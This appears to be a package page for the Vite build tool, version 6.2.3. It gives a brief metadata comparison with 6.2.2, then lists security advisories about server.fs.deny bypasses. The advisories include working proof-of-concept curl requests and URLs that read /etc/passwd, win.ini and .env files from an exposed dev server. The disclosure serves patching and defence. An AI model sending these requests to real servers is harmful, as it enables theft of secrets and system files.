Vite 6.2.3 represents a minor update over version 6.2.2 in this cutting-edge web development build tool. Both versions share fundamental dependencies like Rollup, esbuild, and PostCSS, ensuring consistent core functionality for developers. Examining the package metadata, the devDependencies sections are nearly identical, indicating a focus on development-time tooling and enhancements rather than major feature additions impacting the runtime behavior of Vite. The peerDependencies lists also show no changes, suggesting backward compatibility with existing projects.
The key differentiators appear in the dist sections, where the unpackedSize and releaseDate vary slightly. Version 6.2.3 shows a modestly larger unpacked size (2852213 bytes compared to 2851923 bytes in 6.2.2), possibly hinting at minor optimizations or the inclusion of updated documentation or assets. Moreover, the release date difference of approximately 10 days suggests focused bug fixes and micro-improvements delivered shortly after the preceding release.
For developers, this implies a stable and iterative development process. Upgrading from 6.2.2 to 6.2.3 should be seamless with minimal risk of breaking changes. The consistency in dependencies and peer dependencies underlines Vite's commitment to maintaining a reliable ecosystem. Vite continues to provide a zero config experience with hot module replacement and lightning-fast speeds. While the scale of this particular update might be incremental, staying current with the latest releases ensures accessing the most recent performance tweaks and refinements within Vite's evolving ecosystem. This commitment to continued support is great news for web developers who need a performant build tool.
All the vulnerabilities related to the version 6.2.3 of the package
Vite has a server.fs.deny bypassed for inline and raw with ?import query
The contents of arbitrary files can be returned to the browser.
Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.
?inline&import (originally reported as ?import&?inline=1.wasm?init)?raw?import/@fs/ isn't needed to reproduce the issue for files inside the project root.
Original report (check details above for simplified cases):
The ?import&?inline=1.wasm?init ending allows attackers to read arbitrary files and returns the file content if it exists. Base64 decoding needs to be performed twice
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev
Example full URL http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?init
Vite allows server.fs.deny to be bypassed with .svg or relative paths
The contents of arbitrary files can be returned to the browser.
Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.
.svgRequests ending with .svg are loaded at this line.
https://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290
By adding ?.svg with ?.wasm?init or with sec-fetch-dest: script header, the restriction was able to bypass.
This bypass is only possible if the file is smaller than build.assetsInlineLimit (default: 4kB) and when using Vite 6.0+.
The check was applied before the id normalization. This allowed requests to bypass with relative paths (e.g. ../../).
npm create vite@latest
cd vite-project/
npm install
npm run dev
send request to read etc/passwd
curl 'http://127.0.0.1:5173/etc/passwd?.svg?.wasm?init'
curl 'http://127.0.0.1:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw'
Vite has an server.fs.deny bypass with an invalid request-target
The contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun.
Only apps with the following conditions are affected.
HTTP 1.1 spec (RFC 9112) does not allow # in request-target. Although an attacker can send such a request. For those requests with an invalid request-line (it includes request-target), the spec recommends to reject them with 400 or 301. The same can be said for HTTP 2 (ref1, ref2, ref3).
On Node and Bun, those requests are not rejected internally and is passed to the user land. For those requests, the value of http.IncomingMessage.url contains #. Vite assumed req.url won't contain # when checking server.fs.deny, allowing those kinds of requests to bypass the check.
On Deno, those requests are not rejected internally and is passed to the user land as well. But for those requests, the value of http.IncomingMessage.url did not contain #.
npm create vite@latest
cd vite-project/
npm install
npm run dev
send request to read /etc/passwd
curl --request-target /@fs/Users/doggy/Desktop/vite-project/#/../../../../../etc/passwd http://127.0.0.1:5173
Vite's server.fs.deny bypassed with /. for files under project root
The contents of files in the project root that are denied by a file matching pattern can be returned to the browser.
Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.
Only files that are under project root and are denied by a file matching pattern can be bypassed.
.env, .env.*, *.{crt,pem}, **/.env**/.git/**, .git/**, .git/**/*server.fs.deny can contain patterns matching against files (by default it includes .env, .env.*, *.{crt,pem} as such patterns).
These patterns were able to bypass for files under root by using a combination of slash and dot (/.).
npm create vite@latest
cd vite-project/
cat "secret" > .env
npm install
npm run dev
curl --request-target /.env/. http://localhost:5173